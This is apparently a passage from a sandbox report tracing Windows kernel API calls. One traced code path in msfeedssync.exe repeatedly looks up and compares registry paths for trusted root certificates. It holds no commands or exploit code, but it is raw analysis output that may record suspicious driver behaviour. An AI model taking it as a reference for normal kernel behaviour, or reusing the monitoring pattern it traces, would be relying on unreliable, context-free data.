| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c84f8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46f0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8500, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a46f8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8508, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4700 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8510, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4708 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8518, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4710 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8520, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4718 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8528, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4720 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8530, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4728 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8538, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4730 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8540, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4738 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8548, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4740 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8550, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4748 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4750 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4758 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4760 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4768 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4770 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4778 |
| KeProcessorGroupAffinity | ret_val_out = 0x1 |
| KeSetSystemGroupAffinityThread | Affinity_unk = 0xffffd0002d206f48, PreviousAffinity_unk_out = 0x0 |
| KeRevertToUserAffinityThread | - |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x936, Tag = 0x6944624f, ret_val_ptr_out = 0xffffe0003a77e6c0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x59587, Tag = 0x6944624f, ret_val_ptr_out = 0xffffe0003ca0b000 |
| KeSetCoalescableTimer | Timer_unk = 0xffffe0003af29384, DueTime_unk = 0xffffffffb7a9baa7, Period = 0x0, TolerableDelay = 0x662, Dpc_unk = 0xffffe0003af293c4, Timer_unk_out = 0xffffe0003af29384, ret_val_out = 0 |
| KeWaitForMutexObject | - |
Kernel Graph 48
Code Block #56 (EP #166)
»
| Information | Value |
|---|---|
| Trigger | ??_C@_1DA@HOOFFHMM@?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?9?$AAM?$AAU?$AAI?$AA?9?$AAL?$AAa?$AAn?$AAg?$AAu?$AAa?$AAg?$AAe?$AA?9?$AAS?$AAK?$AAU?$AA?$AA@FNODOBFM@+0x1493 |
| Start Address | 0xffffe0003c959224 |
Execution Path #166 (length: 2, count: 3, processes: 3)
»
| Information | Value |
|---|---|
| Sequence Length | 2 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
| Process 42 (iexplore.exe, PID: 556) | 1 |
| Process 11 (svchost.exe, PID: 324) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c959794, SpinLock_unk_out = 0xffffe0003c959794, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c959794, NewIrql_unk = 0x780d1c02, SpinLock_unk_out = 0xffffe0003c959794 |
Kernel Graph 49
Code Block #57 (EP #194)
»
| Information | Value |
|---|---|
| Trigger | MiIsAddressValid+0xa9 |
| Start Address | 0xfffff800fc2cb628 |
Execution Path #194 (length: 1592, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 1592 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\28F97816197AFF182518AA44FEC1A0CE5CB64C8A, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\28F97816197AFF182518AA44FEC1A0CE5CB64C8A | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\28F97816197AFF182518AA44FEC1A0CE5CB64C8A, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\28F97816197AFF182518AA44FEC1A0CE5CB64C8A | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\28F97816197AFF182518AA44FEC1A0CE5CB64C8A, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\28F97816197AFF182518AA44FEC1A0CE5CB64C8A | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\293621028B20ED02F566C532D1D6ED909F45002F, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\293621028B20ED02F566C532D1D6ED909F45002F | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\293621028B20ED02F566C532D1D6ED909F45002F, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\293621028B20ED02F566C532D1D6ED909F45002F | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\293621028B20ED02F566C532D1D6ED909F45002F, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\293621028B20ED02F566C532D1D6ED909F45002F | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2A1D6027D94AB10A1C4D915CCD33A0CB3E2D54CB, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2A1D6027D94AB10A1C4D915CCD33A0CB3E2D54CB | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2A1D6027D94AB10A1C4D915CCD33A0CB3E2D54CB, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2A1D6027D94AB10A1C4D915CCD33A0CB3E2D54CB | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2A1D6027D94AB10A1C4D915CCD33A0CB3E2D54CB, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2A1D6027D94AB10A1C4D915CCD33A0CB3E2D54CB | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2AC8D58B57CEBF2F49AFF2FC768F511462907A41, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2AC8D58B57CEBF2F49AFF2FC768F511462907A41 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2AC8D58B57CEBF2F49AFF2FC768F511462907A41, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2AC8D58B57CEBF2F49AFF2FC768F511462907A41 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2AC8D58B57CEBF2F49AFF2FC768F511462907A41, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2AC8D58B57CEBF2F49AFF2FC768F511462907A41 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
